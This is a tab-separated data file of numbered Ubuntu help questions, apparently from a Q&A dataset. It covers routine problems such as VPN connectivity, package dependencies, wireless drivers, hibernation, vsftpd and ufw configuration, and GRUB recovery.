426018	trouble with troubleshooting the vpn and pidgin	i bought a kerio account ( vpn account ) recently and i run it by its service . like this : service kerio-kvc start then the pidgin application can not connect to the server . i use following command to get information about kerio 's port : root @ alcintraz : ~/desktop # netstat -tunpl|grep tcp|grep : tcp 0 0 127.0.0.1:7337 0.0.0.0 : * listen 1357/postgres.bin tcp 0 0 127.0.0.1:43434 0.0.0.0 : * listen 8184/kvpncsvc tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1225/mysqld tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen 1418/dnsmasq tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 1076/cupsd tcp6 0 0 : ::80 : : : * listen 2170/apache2 tcp6 0 0 : :1:631 : : : * listen 1076/cupsd it seems this is its port : 8184 then i try to find pidgin with following command when it connect to server but i can not find any thing . lsof -pnl +m -i4|grep pidgin but it can not find any thing however before i start kerio service i got this result : root @ alcintraz : /pentest # lsof -pnl +m -i4|grep pidgin pidgin 4980 1000 14u ipv4 1058763 0t0 tcp 192.168.1.3:38132- > xxx.xxx.xxx.xxx:5050 ( established ) how can i join the server by pidgin and use kerio service simultaneously ? so thanks .
426020	linux name sorting order ?	in windows i could name a folder foobar as _foobar and it would appear on top of a sorted list in the file explorer . what prefix should i use for the same effect in linux . and what is the default order ? will this apply to all file managers by default ? ( i 'm using lubuntu 's default file explorer , but i sometimes use nautilus or krusader ) .
426023	# in crontab used for what ?	if i add up the # in front of some crontab task then it wo n't work and behave as comment ? right ? i want to disable some task for sometime until i like to enable . # * * * * /home/user/xx thanks
426024	what is the purpose of libstdc++-dbg ?	the synaptics package manager says that : this package contains the shared library of libstdc++ compiled with debugging symbols . but i can successfully print the contents of std members in the debugger without having this library . this is probably because most of them are templated , so the compiler can see the entire source code . but what good is a compiled library where the user can not see the source code ? i am really confused . please , could you explain ?
426030	files copied from amarok to ipod disappear	i am using kubuntu 13.10 which has amarok 2.8.0 . i quite like amarok and would like to have it to sync my old 4th gen ipod touch ( 6.1.5 , jailbroken ) . everything works quite nicely : amarok recognizes ipod , lists music in it and i 've been able to copy music from ipod to hard drive by using amarok . and i also manage to copy music from hard drive to ipod . or it seems like that . amarok copies , it displays copied files in its ipod file listing . however , i do n't find any of the new files from ipod itself . after unmounting ipod and mounting it back , amarok can not find them either . so instead of copying , music just disappears . does anyone have an idea what is going on ?
426032	gnome 3.4 use gnome search/scope to run some web query	i 'm running ubuntu 12.04 with gnome 3.4 i wonder if it 's possible to use the `` scope '' - the search line in the desktop overview , to run some web query - like the omnibox in chrome , for example search in google maps or in some company internal site - let 's assume that i want to open a new tab in my browser with the url : somesite.url.com ? query= '' string to search in company site '' . is it possible to achieve such thing ? thanks for the help .
426034	installing ubuntu 12.04 lts in a asus netbook 1005 using windows installer	i was trying to install ubuntu 12.04 in my asus netbook 1005 ( with windows 7 starter ) using windows installer and it freezes with the windows `` preparing to run ubuntu for the first timeâ¨ . i tried several times and it is not working . iâ´m also new to ubuntu . should i try something different , maybe the 13.10 version ? thanks for your answer .
426035	can not install g++ completely	the following packages have unmet dependencies : g++-4.8 : depends : libstdc++-4.8-dev ( = 4.8.1-10ubuntu9 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . kashi @ kashi-inspiron-n5110 : ~ $ sudo apt-get -f install libstdc++-4.8-dev reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libllvm3.1 : i386 use 'apt-get autoremove ' to remove it . suggested packages : libstdc++-4.8-doc the following new packages will be installed : libstdc++-4.8-dev 0 upgraded , 1 newly installed , 0 to remove and 1481 not upgraded . 18 not fully installed or removed . need to get 1,752 kb of archives . after this operation , 11.4 mb of additional disk space will be used . after this the installation hangs and no download speed come . i have tried to change the servers . nothing happens
426038	software to detect my keyboard layout . `` < > '' button types `` ` ~ ''	my keyboard has a button with the signs : `` > '' and `` < `` . this button types `` ` '' and `` ~ '' instead . it 's located up to the left of the 1 button . there are also 2 more messed up buttons . anyways i do n't know `` the name '' of my keyboard layout . how do i identify its type ? i remember when i was installing ubuntu , there was a software that asked me to press certain keys to detect the keyboard type . is there a similar software ? i 'm using lxde by the way .
426040	problems with opening/saving attachment in e-mail as .docx file	when i want to open an attachment ( a .docx file ) in an e-mail ( google chrome ) it automatically gets downloaded and saved as a .ashx file . how can i open this as a .docx file and be able to edit it ?
426041	how can i prevent hibernating if cpu usage is above say 40 % ? ( plex , couchpotato , transmission )	i am using a netbook as plex media server . i use wake on lan to start ubuntu when i feel like watching a movie . windows prevents my pc from going into hibernation when plex is streaming a video to a client . ubuntu does not , after say 20 minutes ubuntu goes into sleep/hibernation . generally my cpu is above 40 % when streaming to a client . i would consider ubuntu as not being idle but obviously ubuntu is . is there a workaround ? something that prevents ubuntu from hibernating if a process or all processes together are using more then 40 % of the cpu ? caffeine is not going to solve my problem because plex media server is running as a service/daemon so i can not set it to keep ubuntu awake if a certain process is running because it would never hibernate . any solution would be really helpful !
426042	how to get my asus pce-n15 wireless adapter to work on 13.10	recently , i 've bought a computer , on which i installed a dual boot windows 7 and ubuntu 13.10 installation . i have temporary access to a wired connection , but i bought a asus pce-n15 wireless network adapter to connect . for windows 7 , i got this adapter to work using the drivers . in ubuntu 13.10 , however , i did not manage to connect it properly . following some good leads on askubuntu , i got abit closer , for example step by step ubuntu 12.04 install of realtek rtl8188ce driver issues installing wireless network driver i downloaded and compile the drivers from https : //github.com/freedomben/rtl8188ce-linux-driver . i followed the instructions in the readme.md file coming with this repository . before i started altering anything , i have the following output from lsmod | grep ^rtl rtl8192ce 53550 0 rtl_pci 26641 1 rtl8192ce rtlwifi 63229 2 rtl_pci , rtl8192ce rtl8192c_common 48877 1 rtl8192ce after following the instructions ( i.e . also editing /etc/modules/ and rebooting ) , i can not seem to add any off the other modules . root @ bernhard-desktop : /home/bernhard # lsmod | grep ^rtl rtl8192ce 137725 0 rtlwifi 110108 1 rtl8192ce root @ bernhard-desktop : /home/bernhard # modprobe rtl_pci fatal : module rtl_pci not found . root @ bernhard-desktop : /home/bernhard # modprobe rtl_8192c_common fatal : module rtl_8192c_common not found . when rebooting , after a little while , i get a notification that tells me that i am connect to my wifi-network . however , when i try to open a web-page or make an ssh-connection , i do not get any information transfered , which is not a problem for my wired connection . proof of the above statements is as follows root @ desktop # nmcli d device type state wlan0 802-11-wireless connected eth0 802-3-ethernet unavailable root @ desktop # ping -c2 4.2.2.2 ping 4.2.2.2 ( 4.2.2.2 ) 56 ( 84 ) bytes of data . -- - 4.2.2.2 ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 1007ms my question is the following : what am i overlooking , or doing wrong , and how can i fix this issue and connect to the internet by wifi , using my asus adapter ?
426043	recover /etc/apt/preferences.d	iâm new to ubuntu but not so noob .. i learn fast and i have a dream to be a developer .. i break up with windows and jump into the world of unix . so what i did is that i had the duplicate repository in resources.list i did manage that and i still have the problem .. i figure out that others resources.list exit in the /etc/apt/prefernces.d/ folder so i removed the whole folder and now i ca n't use the apt-get it tells me w : unable to read /etc/apt/preferences.d/ - fileexists ( 2 : no such file or directory ) i tried with the devilscripts ( hardy ) but i did n't get it . so please if some one could upload the folder for me iâm stuck . i get this message exactly when i 'm trying to add-repository ioerror : [ errno 2 ] no such file or directory : '/etc/apt/sources.list.d/webupd8team-y-ppa-manager-saucy.list' thnks everyone the problem was n't so complicated i just mkdir the directory and now everything is fine thnks
426044	how to install cfengine in ubuntu ?	i am using ubuntu 12.04 lts . i am looking for a way to install cfenguine in my ubuntu . could somedoby help me with that ? thank you .
426046	ubuntu 13.10 hibernate does n't save the system state	i have enabled the hibernation option as described here . i have the option appearing in the power toggles ( both in unity & gnone-shell ) . when i use it , the computes seems to save everything and shut down . as soon as i turn it on again , it starts ubuntu from scratch , with no trace of the open programs during the hibernation . i 've searched about it and saw that having not enough swap can make this happen . i 've checked my partitions : i have 3 swap partitions each one of them is 4.3 gb , when my ram is 4 gb ( so i do n't think this is the case ) . how can i fix this problem ? thank you !
426052	ca n't switch between os	i want to remove ubuntu from this pc . when i restart the computer and try to arrow down to windows 8 , i am unable to use the keyboard . it just does n't work . i need to be able to select windows 8 to remove my partition and delete ubuntu .
426055	set max-routes from network-manager-openvpn	the openvpn of my company is pushing about 250 routes . i can connect by the command line interface of openvpn by using max-routes 300 in the clients config file . by importing this file into nm , this setting is ignored and the connection fails due to too many routes . there is already a bug report upstream , nevertheless , i 'm searching for a workaround for the few colleagues running linux . all of them run ubuntu , therefore a ubuntu-specific workaround would help . to give some starting point , what i searched for and google was not answering is the possibility of a global configuration of openvpn options to set max-routes or the ability to give nm additional options that do n't show up in the gui .
426058	menu document templates do n't work	i have been trying to install some templates to right-click menu ( create new document - no templates installed ) i searched around and all the guides say to put new ready documents or templates in /home/username/.templates folder , the directory was n't exist so i created but nothing happens . could someone please show me how to fix that , many thanks .
426060	clearing up after removing gnome	i 've just uninstalled gnome ( on 12.04 ) , and thought i 'd have a good clean up after . i found a useful page that showed what to remove in my home dir , but if i do a search for 'gnome ' from root using the file manager , i get hundreds of folders and files . some done't even have gnome in the name . will the obvious ones , that do have gnome in the name , be used by anything else or is it safe to manually remove them ? thanks
426061	connect failure iscsi client to iscsi server	i am trying to connect my virtual client to connect to iscsi server , but get errors . my servers ipadress is : 192.168.56.102 when i run : sudo iscsiadm -m discovery -t st -p 192.168.56.102 i get this out : 10.0.2.15:3260,1 iqn.2014-02.com.example : lvm 192.168.56.102:3260,1 iqn.2014-02.com.example : lvm when i try to log in : : iscsiadm -m node -- login i get this failure : logging in to [ iface : default , target : iqn.2014-02.com.example : lvm , portal : 10.0.2.15,3260 ] logging in to [ iface : default , target : iqn.2014-02.com.example : lvm , portal : 192.168.56.102,3260 ] iscsiadm : could not login to [ iface : default , target : iqn.2014-02.com.example : lvm , portal : 10.0.2.15,3260 ] : iscsiadm : initiator reported error ( 8 - connection timed out ) iscsiadm : could not login to [ iface : default , target : iqn.2014-02.com.example : lvm , portal : 192.168.56.102,3260 ] : iscsiadm : initiator reported error ( 19 - encountered non-retryable iscsi login failure )
426065	macbookpro 10.9.1 installing linux wirless drivers	i 've just installed linux on my mac 10.9.1 and i have no internet connection or any wi-fi signal . i 've installed linux by creating a partition and i really need help on this . none of the tutorials i 've found works on my macbook pro version , so if somebody could help me with this issue i would really appreciate it .
426070	problem installing audacity recording tool	i 've been trying to install audacity recording tool which consists of around 2mb . when i try to install audacity from synaptic package manager/terminal , i get following message . the following packages have unmet dependencies : audacity : depends : libflac++6 ( > = 1.2.1 ) but it is not installable depends : libmp3lame0 but it is not installable depends : libportsmf0 but it is not installable depends : libsoundtouch0 but it is not installable e : unable to correct problems , you have held broken packages . what should i do to get it resolved ?
426072	repair more than 3500 bad blocks in 160 gb samsung hdd using ubuntu 12.04	recently i detected more than 3500 bad sectors on my samsung 160 gb hdd . is it possible to repair or ignore this amount of bad sectors using ubuntu 12.04 ? and what is the max . limit of bad sectors to be repairable ?
426073	system hangs when dbus service is restarted	when i run the command service dbus restart the system hangs . i can move the mouse pointer properly but toolbars can not be seen , terminals can not be opened and i can not do anything till i reboot my system . i am using ubuntu12.04 . please suggest me some solution .
426074	double password entry when changing active users in ubuntu 13.10	there are three primary users of my ubuntu 13.10 cinnamon 2.14 install : me , my wife , and our oldest daughter . everything seems to work just fine unless we change users . when one user is active , we press the usual ctrl+alt+l ( or select from the gui ) . if switching to a non-logged in user , it 's fine : enter password once on greeter , load desktop . when switching back to a user that was already logged in and active , enter greeter password , then enter password again to unlock screensaver when other active user 's desktop loads . under older versions i did n't have to do double-duty when switching between active users and wonder if there is some side effect i 've missed because my 13.10 was originally unity , which i hated , nuked entirely , and replaced with cinnamon . any thoughts , suggestions , ideas or recommendations would be welcome ! system details : root @ optiplex-gx620 : ~ $ linux optiplex-gx620 3.12.6-031206-generic # 201312201218 smp fri dec 20 17:20:06 utc 2013 x86_64 x86_64 x86_64 gnu/linux root @ optiplex-gx620 : ~ $ dpkg -l | grep cinn ii cinnamon 2.0.14-20131203040025-saucy amd64 cinnamon desktop ii cinnamon-common 2.0.14-20131203040025-saucy all cinnamon desktop ( common data files ) ii cinnamon-control-center 2.0.9-20131124013238-saucy amd64 utilities to configure the cinnamon desktop ii cinnamon-control-center-data 2.0.9-20131124013238-saucy all configuration applets for cinnamon - data files ii cinnamon-dbg 2.0.14-20131203040025-saucy amd64 debugging symbols for the cinnamon desktop ii cinnamon-desktop-data 2.0.4-20131124011540-saucy all common files for cinnamon desktop apps ii cinnamon-screensaver 2.0.3-20131105013303-saucy amd64 cinnamon screen saver and locker ii cinnamon-session 2.0.6-20131124043042-saucy amd64 cinnamon session manager - minimal runtime ii cinnamon-session-common 2.0.6-20131124043042-saucy all cinnamon session manager - common files ii cinnamon-settings-daemon 2.0.8-20131203004543-saucy amd64 daemon handling the cinnamon session settings ii cinnamon-settings-daemon-dev 2.0.8-20131203004543-saucy amd64 headers for building applications communicating with cinnamon-settings-daemon ii cinnamon-translations 2.0.3-20131203040238-saucy all translation files for the cinnamon desktop ii gir1.2-cinnamondesktop-3.0 2.0.4-20131124011540-saucy amd64 introspection data for cinnamondesktop ii libcinnamon-control-center-dev 2.0.9-20131124013238-saucy amd64 utilities to configure the cinnamon desktop ii libcinnamon-control-center1 2.0.9-20131124013238-saucy amd64 utilities to configure the cinnamon desktop ii libcinnamon-desktop-dev 2.0.4-20131124011540-saucy amd64 utility library for loading .desktop files - development files ii libcinnamon-desktop0 2.0.4-20131124011540-saucy amd64 utility library for loading .desktop files - runtime files any other details i 've missed ( if any ) can be provided if you need them . thanks !
426077	my laptop suddenly does n't turn off screen , when closing lid	i installed ubuntu 13.10 on my vaio pro 13 back in october , 2013 . ever since everything has worked flawlessly . now yesterday when i closed the lid ( as normal ) , i noticed that my screen and computer did n't suspended . it therefore uses lots of power for the screen and lots of power , because it does n't even stop anything . it 's like closing the lid is just cosmetic.. my settings in ubuntu 13.10 with dconf-editor as seen , the settings should be right my settings in ubuntu 13.10 with normal settings menu n책r l책get lukkes '' and `` hvile '' means something like `` when closing lid '' and `` suspend '' . it is danish , just for info i was wondering if there was a way to check wether some application might prevent it from suspending ? or if there is some other way to check if these settings are `` valid '' ? i have no clue .
426079	routing 192.168.168.0/24 out eth0 , all else out wlan0	good morning/afternoon/evening , i have been tasked with the configuration of multiple , sonicwall isr 's , and thought i could use this as a bit of a linux learning curve . what i am attempting to do , is setup a currently unused laptop as a `` configuration station '' , per say , so that , if i am sent offsite for other issues , i can remote back in via rdp and continue configuring said routing devices . by default , all the sonicwall 's are on the 192.168.168.0/24 subnet , connected via eth0 ( iv'e already set the ip to 192.168.168.2/24 to accommodate ) , which is fine as it will stay at its default address until deployed . i already have rdp setup and operational via xrdp , but the issue comes in when rdp'ing in from off site while the isr to be configured is connected to eth0 . when the isr is not connected , i can access via rdp fine . i am under the impression that acl 's ( access control lists ) can be added to a ubuntu machine much like a firewall to separate traffic to different interfaces . what i need to accomplish : route traffic to 192.168.168.0/24 network out eth0 ( 192.168.168.2/24 ) route traffic to all other out wlan0 ( 192.168.1.121/24 ) thank you , in advance , for your time !
426080	vsftpd login incorrect issue	i install vsftpd on my ubuntu server , this follow is my vsftpd.conf file : listen=yes anonymous_enable=no local_enable=yes check_shell=no write_enable=yes local_umask=022 dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes chroot_list_enable=yes chroot_list_file=/etc/vsftpd.chroot_list secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=ftp rsa_cert_file=/etc/ssl/private/vsftpd.pem then i try login the ftp server on my mac : $ ftp 162.243.78.240 connected to 162.243.78.240 . 220 ( vsftpd 2.3.5 ) name ( 162.243.78.240 : tangmonk ) : demo 331 please specify the password . password : 530 login incorrect . ftp : login failed the demo user 's password is absolutely correct , but i do n't know why login incorrect .
426084	sony vaio vpccb driver issues	i have a vaio vpccb laptop running ubuntu 12.04 lts as my single os . i know my webcam and microphone do n't work . now that im using skype a lot more for group projects in school it is becoming a pain not to have video/audio . anyone know how to get cam and mic working ? ? ? cheers . edit : i have attempted to install the drivers posted in other vaio cam problems but none seem to work . this is the webcam : bus 001 device 021 : id 05ca:18ff ricoh co. , ltd when i use `` lspci '' this is the only related info from what i can see ... 02:00.0 sd host controller : ricoh co ltd pcie sdxc/mmc host controller ( rev 07 ) 02:00.1 system peripheral : ricoh co ltd device e232 ( rev 04 )
426085	can a webcam be used by more than one applications at the same time ?	can a webcam be used by more than one applications at the same time ? i would like to use it simultaneously under skype and under guvcview , but it ca n't do that . thanks !
426086	how do i get ubuntu to stay installed ?	i am trying out ubuntu , i have installed it numerous times only to have it ask me to either try ubuntu or install it.it will not take the installment . it seems to work in trial mode but if installed after rebooting i am asked again to install it . anyone know what i am doing wrong ? in the trial mode it works just fine most of the time . it sometimes locks up and i have to then reinstall ubuntu in trial mode . it is a pain as i lose what i have installed . my computer is an older model that had windows xp pro 32 bit on it . xp pro has been removed and the 1 tb hd re-formated so there is no trace of xp pro . only ubuntu is on my hd . i would like to have both ubuntu and win xp installed but it is not possible at this point .
426087	what is the relationsips between ubuntu , kubuntu and kernel	what is the relationship between ubuntu , kubuntu and kernel ? and do different distributions of linux , such as red hat , opensuse , use the same kernel ?
426088	internet explorer is not being installed , and getting stopped in between ?	i recently tried to install internet explorer in ubuntu 12.04 with the help of wine . i did the following : i downloaded ie 8 for vista . it installed , but did not work properly . i could not figure out how to exactly uninstall it , so i deleted the ie folder . then i downloaded ie 7 for xp . however it did not install completely . but now i figured out how to uninstall a wine software . so i removed internet explore through wine . then i tried to install ie 10 for 8 . it now gives me an error message : internet explorer did not finish installing . what should i do now ?
426089	notify-send wo n't show notification unless run with sudo	i have just tried to use notify-send on my 13.10 machine and ca n't get it to work without using sudo with it . i do n't know what details can i provide with this issue . my notify-osd version : $ ii notify-osd 0.9.35+13.10.20130917.1-0ubuntu1-leolik~ppa0 amd64 daemon that displays passive pop-up notifications on regular version for 13.10 there was the same issue . edit $ ll /usr/bin/notify-send -rwxr-xr-x 1 root root 14720 wrz 10 16:12 /usr/bin/notify-send
426092	start-up / reboot scripts for different users	i 'm still trying to learn a little more about bash scripting and start-up / reboot , i have read about crontab @ reboot and also just looking at other options but i just wondered if someone could maybe point me in the right direction before i find out there are limits on the method i am trying so on ... here is what i am trying to accomplish : i have 2 users that need to run processes on reboot / start-up : user1 : 5 processes all run with standard privileges ( no problems here ) user2 : 2 escalated commands ( sudo ) and 5 processes standard privileges to be run but only once mysql and the above processes are active . i only have ssh access to the server so this is why i have opted from the info i have been reading to try the bash/cron method . i have tested sudo command works with a bash script and seems to be good , all the accounts use keys rather than passwords so i do not get prompted to confirm the password , i 've yet to test this on a reboot but will do very soon . the main problem is checking if the 5 processes run by user1 have loaded before letting user2 start its work , with two separate bash scripts is it possible to create a wait or loop to check for running process names before continuing on ? thanks
426094	is ibus necessary on ubuntu 13.10	so it appears that ibus is started by default on saucy , but unfortunately this is leading to problems with my intellij installation as per this bug : http : //youtrack.jetbrains.com/issue/idea-78860 so my question is : would disabling ibus cause any problems ? it appears its for multilingual keyboard support which is not necessary for me as i am just using default en keyboard layout .
426095	backup an ipod nano 4th generation ?	i have an ipod nano 4g and it is slowly dying on me . i would thus like to make a backup of its user data contents ( so as to drop them later on onto a sandisk sansa clip zip ) . can i do it from within ubuntu ?
426099	ax88179 usb3.0 to ethernet adapter on a dell xps13 with 12.04	i have some issues with an ax88179 usb3.0 to ethernet adapter . i am running 12.04 on a dell xps 13 . i bought the adapter last week and after i installed the drivers that are provided here http : //www.asix.com.tw/download.php ? sub=driverdetail & pitemid=131 , it worked fine . but the next day it could n't connect any more . then i tried to reinstall the drivers . it did n't help . then i tried to install the driver via : sudo add-apt-repository ppa : qji/ax88179 sudo apt-get update sudo apt-get install ax88179 but after all that the adapter does n't work at all ( but the adapter works on a mac . i would be grateful if somebody could help me ! thanks pit
426101	getting low uploading speed	im using ubuntu 12.04 desktop , and i am getting low uploading speed . download speed is ok like 12 mbps , but not getting proper uploading speed . i checked same on windows also , i get there proper upload speed but not getting on ubuntu . i get 2.50 mbps upload speed on windows on same machine but cant get same upload speed on ubuntu . i do n't use any router , i use direct cable net with modem . please if any 1 knows solution then pls share sm with me . thanks . abhinav h .
426103	ca n't connect to wifi on ubuntu 12.04	i recently installed ubuntu 12.04 alongside windows 8.1 , but can not connect to wifi form ubuntu . the wifi router is not listed as an option in the dropdown menu , but is clearly working because i can connect to it when using windows . i have read countless q and a 's similar to this , but unfortunately none of the solutions that people provided worked for me . thanks to whoever answers this !
426104	gedit 'broken ' after update on ubuntu 13.10	i have upgraded from ubuntu 12.10 to 13.10 . in the meanwhile i have removed the enthought python distribution manually because i want to start back on the 'official ' packages . so i removed the python folder and redirected the pythonpath towards the official package . here a dump of pythonpath : $ echo $ pythonpath /usr/local/madagascar_1.5/lib/python2.7/dist-packages : /usr/lib/python2.7 : /usr/local/lib/python2.7 : /usr/local/madagascar_1.5/lib/python2.7 : /usr/local/madagascar_1.5/lib/python2.7/dist-packages : /usr/local/madagascar_1.5/lib : /usr/lib/python3 which is theoretically what you need to get everything working . i code with python 2.7 and everything works perfectly . however to start gedit i need to export pythonpath=/usr/lib/python3 whereas it is already in pythonpath . as gedit depends on python 3 now . i followed this solution but to me it is not satisfactory : multiple versions of python when i update my packages with aptitude , i get an error message that gedit has inconsistencies . so the general advice is to reinstall gedit . here the output : sudo apt-get -- reinstall install gedit reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 3 not upgraded . 1 not fully installed or removed . need to get 0 b/492 kb of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 304259 files and directories currently installed . ) preparing to replace gedit 3.8.3-0ubuntu3 ( using ... /gedit_3.8.3-0ubuntu3_amd64.deb ) ... fatal python error : py_initialize : unable to get the locale encoding file `` /usr/lib/python2.7/encodings/__init__.py '' , line 123 raise codecregistryerror , \ ^ syntaxerror : invalid syntax aborted ( core dumped ) dpkg : warning : subprocess old pre-removal script returned error exit status 134 dpkg : trying script from the new package instead ... fatal python error : py_initialize : unable to get the locale encoding file `` /usr/lib/python2.7/encodings/__init__.py '' , line 123 raise codecregistryerror , \ ^ syntaxerror : invalid syntax aborted ( core dumped ) dpkg : error processing /var/cache/apt/archives/gedit_3.8.3-0ubuntu3_amd64.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 134 no apport report written because maxreports is reached already fatal python error : py_initialize : unable to get the locale encoding file `` /usr/lib/python2.7/encodings/__init__.py '' , line 123 raise codecregistryerror , \ ^ syntaxerror : invalid syntax aborted ( core dumped ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 134 errors were encountered while processing : /var/cache/apt/archives/gedit_3.8.3-0ubuntu3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i was wondering if it was my pythonhome which was not properly defined but it did not bring me anywhere to export a variable . now the other annoyance is that ubuntu-desktop being dependant of gedit , it is also broken after an update i made ( without thinking ... ) . so now i have no more desktop . screen is black after logging . any suggestion to put gedit back on track ? thanks in advance
426106	apt-build on ubuntu , if i change processor will give problem ?	i installed apt-build on ubuntu , it is a program that compiles and installs programs . it compiles optimally for the user processor and this makes programs run quickly . but i thought what if i change my processor in the future , programs compiled for the old processor will present problems ? if yes , then i have to compile again ? please someone who use apt-build help me .
426111	cat /dev/ttys0 junk	i have a embedded device connected to my ubuntu host . to get serial logs i type cat /dev/ttys0 , however after the initial boot there is a ton of junk . my host is a minimal ubuntu command line build . if i install the full ubuntu desktop and then run cat /dev/ttys0 it works flawlessly . is there any specific app that i need to install to get it working in minimal ubuntu , i dont really want to install all the components of a gui just to get a clean way of running cat /dev/ttys0 .
426119	virtualbox fatal error no media found	installed xubuntu 13.10 on my virtual machine on win8 host . everything was ok , so i installed only lamp without any modification . next day i switched up virtual machine i got error message on booting : fatal : no bootable medium found ! system halted what i tried : change ide drives to sata boot live cd and repair boot i was able to run live cd , updated and installed boot-repair and run it . after reboot the same error , even if i want to boot to live cd . my virtual machine was 'empty ' so the backup is not necessary please help me to fix this strange error .
426123	decent equalizer for 12.04 ?	i am looking for decent equalizer for ubuntu 12.04 . recently , with 13.04 and 13.10 i have tried pulseaudio eq and other eq 's . all of them were rubbish . mainly because the output volume , because of them , decreased about 70 % and equalizer it self ( other than decreasing volume output ) did nothing . i have built in realtek audio chipset . i have not messed around with any sort of drivers , i have completely clean install of ubuntu . any ideas ?
426124	my battery is lasting only for 1 hour on ubuntu 12.04 , while it lasts 3 1/2 hours on windows 7 ! why is it so ? what can i do to solve that ?	this may look like a duplicate question , but answers to other similar questions are very specific of the laptop configurations . so , felt that would n't apply to my system . i 'm dual booting with windows 7 and ubuntu 12.04 . my computer is an dell inspiron 5520 , it has the following hardware ; i3 - 3110 2.4ghz processor 6gb ram let me know if i need to provide any other info . thanks in advance
426126	my fan is very noisy pretty much all of the time - how do i fix it ?	here is my sensors output : acpitz-virtual-0 adapter : virtual device temp1 : +54.0°c ( crit = +98.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +55.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +55.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +50.0°c ( high = +87.0°c , crit = +105.0°c ) i have just firefox running . i have a novatech nfinity ultrabook . ram : 8gb processors : intel® core™ i7-3517u cpu @ 1.90ghz × 4 graphics : intel® ivybridge mobile x86/mmx/sse2 hard drive : 228ssd os : 32 bit 12.04 lts i do not understand why it is running so hot . also , it occasionally totally freezes and i suspect this is to do with how hot it is . am i right in thinking that ?
426128	grub refresh or resolution too high . how can i adjust it ?	i installed ubuntu 12.04 using the windows installer while in windows xp . when i reboot and select ubuntu as my boot option my monitor tells me `` out of range '' i believe at this point i would be looking at the grub bootloader and could choose regular or safe boot for linux and the default option is likely selecting after several seconds . after waiting several minutes ( when ubuntu would be fully loaded ) the resolution or refresh rate are still too high or low for me to do or see anything . my monitor tells me the w refresh is 40hz ( too low ) and h is 80hz ( too high . ) i would like to adjust the resolution for grub and ubuntu to resolution to 1024*768 and refresh rate to 60hz , i believe then i will be able to see things after choosing ubuntu from the windows bootloader . how can i go about adjusting this , considering i am unable to see anything in the bootloader or ubuntu os ? i am able to work with windows xp still if that opens up any options .
426132	share tab disappered when viewing folder properties ?	when i tried to share a folder called test i found that the share tab was missing in folder properties . i am wondering how to restore it as i think it disappeared after samba4 was installed . here is a screen-shot of what i now see when i go into folder properties . it should be like below screenshot : can anyone give any help ?
426135	ufw locks me out of server everytime i run it	background : i 'm setting up a new 12.04 instance on a vps with a new provider.the vps provider only offers a 32bit image but that really should n't matter here . i have no local access to the machine and there is no rescue system ; every time i try something i have to use their web admin tools to reinstall the image . problem : every time i try to install and setup ufw i end up being locked out of the server . here are the commands i 've been running : locale-gen `` en_us.utf-8 '' locale-gen `` en_ca.utf-8 '' apt-get update apt-get -y upgrade apt-get -y install nano ufw git ufw allow ssh ufw allow sftp ufw allow ftp ufw allow smtp ufw allow `` apache full '' ufw allow out 53 ufw enable i 've also tried first running the defaults sudo ufw default deny incoming sudo ufw default deny outgoing as well as making sure that -a ufw-user-input -p tcp -- dport 22 -j accept is in /lib/ufw/user.rules in all cases and every combination i 've tried i end up losing the connection to the server and being totally locked out . i 've had to reinstall the image about 5 times now . this is my fourth ubuntu 12.04 server but for some reason it 's totally different than the others . all of the others are running ufw with no problems . i also tried all of the above steps on a debian 7 64bit image with this vps provider but had the same problem . what 's going on here ?
426138	computer running on grub console	i just restared my computer and the graphic ubuntu grub no longer appears . now there 's a console with the grub prompt . i have no idea what to do and i ca n't even start any os because i do n't know how , i just want to get back to the way it used to be . i think this happened because i made and update , then i was asked if i wanted grub to be restored to default and i just said yes . i did n't expect this to happen . i am not very skilled with linux as you can see ... what can i do ?
426139	nas device failed and i am attempting to get data back - help !	not a linux guy ! ~ tried on windows pc and failed . put the nas device hard drive is in an older pc with kali in forensic mode because device failed and all no longer allowed access to data on hard drive kali shows the hitachi drive but states `` unallocated '' . to my knowledge all data was on when failure occurred . this drive has all data for 12 years of kids , family , etc . tried fdisk and can not get access either , also tried mounting several ways to no avail . all help is appreciated
426145	having trouble with a touchpad fix for my arm chromebook with 12.04 lts	this : http : //retrofatty.blogspot.com/2013/02/chrubuntu-install-and-fixes.html about a quarter of the way down the page , has instructions to apply a fix for the trackpad , but entering the first line in terminal gave me two directory doesnt exist errors , can anyone tell me a corrected commmand sequence ?
426148	ubuntu screen is too stretched	i recently installed ubuntu 12.04 in my lenovo ideapad s110 and the screen appears too stretched i have tried installing the drivers reading the posts at ask ubuntu itself but i could n't find any answer that worked for me . my screen resolution is set to default with the ratio of 4:3 and the display manager does not show any other screen resolution option or any other ratio . please help me out .
426149	create a change log ( timestamped ) in kubuntu ?	i want to keep a change log of things i do in kubuntu - in other words if i tweak some setting i want to make a written record of it so i can roll back if i screw up . what 's the best way to do this ? i know that in windows notepad i could add `` .log '' to the start of a file and it would insert the time and date after each entry . i see that kubuntu 's kate editor has a `` changelog '' mode , but could i use this for what i want to do ?
426150	double boot-up alongside windows 8 and my hard-drives are not showing in windows	i 've installed ubuntu along with windows 8 . for that , i had to convert all of my hard drives from dynamic to basic . however , i did not face any problem in installing ubuntu and it got successfully installed . but when i opened windows , it was not showing any of the hard-drives apart from c ( in which windows is installed ) . now , ubuntu is showing all of my hard-drives and their data but i am not able to find my data and hard-drives in windows . what should i do ?
